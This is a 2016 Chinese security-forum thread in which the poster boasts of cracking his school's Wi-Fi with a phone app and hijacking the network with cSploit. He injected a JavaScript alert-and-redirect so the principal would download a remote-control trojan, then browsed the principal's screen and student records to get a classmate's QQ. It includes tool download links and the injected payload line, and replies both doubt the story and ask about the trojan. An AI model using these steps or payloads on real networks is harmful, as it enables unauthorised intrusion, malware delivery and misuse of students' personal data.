瞅啥瞅 发表于 2016-7-13 13:43

我是如何通过WIFI渗透进校长电脑(一)

本帖最后由 瞅啥瞅 于 2016-7-14 13:47 编辑

作者:jing0102
来源:i春秋社区
bbs.ichunqiu.com


0x01 介绍
本人由于刚接手本板块呢,就发挥了我多年不用的通信安全方面的技术。在学校考试听见同学说学校wifi密码知道了,于是我问他们要密码死活不给我,可能是怕我"小动作",于是。。。。

0x02 内容发展
因为我的好童鞋不告诉我wifi的密码,所以我就拿起神器开始漫长的破解:
因为在学校没有笔记本,所以只好用可怜的手机来进行破解。(因为手机内存不够所以没有安装kalilinux)工具:1.幻影WIFI(手机软件)下载地址:http://pkg.fir.im/d0ab1120d05f11e4a5e73733129d76ac4d9da714.apk?attname=%E5%B9%BB%E5%BD%B1Pin1.75.apk_1.75.apk&e=1465023740&token=LOvmia8oXF4xnLh0IdH05XMYpH6ENHNpARlmPc-T:VZvO1NeJPKHv40OnILyOuItmJl8=


2.字典
这边字典我是自己按照学校的一些信息来设置的
3.时间(因为字典的大小取决于破解的效率,所以牛逼的字典和牛逼的手机配置也是需要很长时间的)
废话不多说,直接来操作,打开幻影WIFI
把自己的字典设置好后,点击破解选中学校的wifi,进行破解:
http://bbs.ichunqiu.com/data/attachment/forum/201606/04/133135q9buaauksa9cmccm.png
大概是跑了2个多小时,因为我考完语文后发现破解成功的记录已经有了:
http://bbs.ichunqiu.com/data/attachment/forum/201606/04/133359mkks88ulnk6exkb8.png
搞了半天密码原来是校长的手机号+名字开头。。
成功的连接了密码后,当然是先192.168.1.1进入路由器管理,可是这可恶的网络管理员让我破解了30分钟都没破出密码,我就放弃了从这方面入手的想法。
但是呢我是谁?答:"黑客"。
于是乎祭出了杀器"cSploit",这是一款适用于安卓通信网络安全分析和渗透的工具。
下载地址:https://github-cloud.s3.amazonaws.com/releases/24782902/adb00552-f52c-11e5-9e5f-3b3aef90ccc8.apk?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAISTNZFOVBIJMK3TQ%2F20160604%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20160604T060355Z&X-Amz-Expires=300&X-Amz-Signature=9977770c7e766e82ab282af3f0436a125dfdbaffd60718d4e87c4f0069062627&X-Amz-SignedHeaders=host&actor_id=0&response-content-disposition=attachment%3B%20filename%3DcSploit-release.apk&response-content-type=application%2Fvnd.android.package-archive


打开cSploit,看到了很多台设备,这么多台该如何寻找呢?其实不需要咱们只需要劫持一个路由器所有人就会被咱劫持。
我是在想控制校长的电脑,去看看有啥好东西。
于是一个邪恶的计划出现了:
利用注入JS文件来跳转让校长下载我之前玩远控时的被控端,等回家后就可以控制校长的电脑了。
http://bbs.ichunqiu.com/data/attachment/forum/201606/04/134142w4zan54o0d8m9irr.png
于是我构建了这样一串:
[*]alert('请安装客户端后再使用浏览器');

复制代码
window.location.href="****/**.exe";
这边是跳转到我以前被控端下载地址,当诱惑校长自动下载后,当然是有50%的几率是不成功的,这就要我回家看看成果了。
------------------------------many time---------------------------------------
回家后欣喜的发现了我们学校的IP
http://bbs.ichunqiu.com/data/attachment/forum/201606/04/135549i5vdc1dc31o2yd1e.png 真的是天助我也?那么这边为什么断定就是校长的电脑?因为如下:于是打开了屏幕管理,监视了10多分钟没人动电脑,我就开始乱翻了。
http://bbs.ichunqiu.com/data/attachment/forum/201606/04/135816x3m3n2hbh3n34b35.png
翻到了我们学校这届学生的所有信息,通过这个找到了女神的QQ
http://bbs.ichunqiu.com/data/attachment/forum/201606/04/140042di5h9yyggbbogwgg.png
不多说加上QQ就是一阵撩妹= =
--------------end----------------
0x03 结尾
通过这件事可以告诉我们通信安全也是需要重视的,建议学校方面加强WIFI的密码安全性。



      本文来自i春秋社区
更多优秀文章请关注i春秋社区
       bbs.ichunqiu.com


不吃生姜 发表于 2016-7-18 16:48

johnslove 发表于 2016-7-17 00:07
楼主发的是小说

我也觉得不现实,我们跑包都跑的累死累活的,手机两个小时就跑出来了,能跑13位密码只要2个小时,这字典得逆天啊,而且要能知道校长电话也是蛮厉害的。感觉这完全都靠运气了,几乎和自己猜都差不多了。
第二个,要用那个spolit软件的话,必须在一个无线局域网里,无线网范围也不大吧,而且校长的电脑一般在办公室,而办公室一般都在原理教学楼的行政楼里,难道要跑到校长办公室附近一直等着校长上网啊。

yjnchina 发表于 2016-7-13 14:06

{:5_261:}阅

1050239781 发表于 2016-7-13 15:43

太牛逼,那个被控端是什么

残叶. 发表于 2016-7-13 16:01

这个风险太大 XP系统安全机制不好确实 说到底这个还是看人品 并不能百分百做到绝对渗透

瞅啥瞅 发表于 2016-7-13 18:20

残叶. 发表于 2016-7-13 16:01
这个风险太大 XP系统安全机制不好确实 说到底这个还是看人品 并不能百分百做到绝对渗透

应该可以的吧

paston 发表于 2016-7-13 18:29

楼主你乱翻的时候校长的电脑屏幕是同步显示你的操作的吗?

蛤蟆爱天鹅 发表于 2016-7-13 18:45

早几年前就会用了 麻烦不要显摆了还黑客呢,,呵呵吧

瞅啥瞅 发表于 2016-7-13 18:45

paston 发表于 2016-7-13 18:29
楼主你乱翻的时候校长的电脑屏幕是同步显示你的操作的吗?

当然啦

瞅啥瞅 发表于 2016-7-13 18:46

蛤蟆爱天鹅 发表于 2016-7-13 18:45
早几年前就会用了 麻烦不要显摆了还黑客呢,,呵呵吧

没说黑客啊

zhl416 发表于 2016-7-13 19:16

。。。。。多少年前玩的东西了   

343534191 发表于 2016-7-13 21:51

还有点社工的影子,话说你的被控端是免杀的?

869570846 发表于 2016-7-13 22:16

早说嘛!
页: [1] 2 3 4
查看完整版本: 我是如何通过WIFI渗透进校长电脑(一)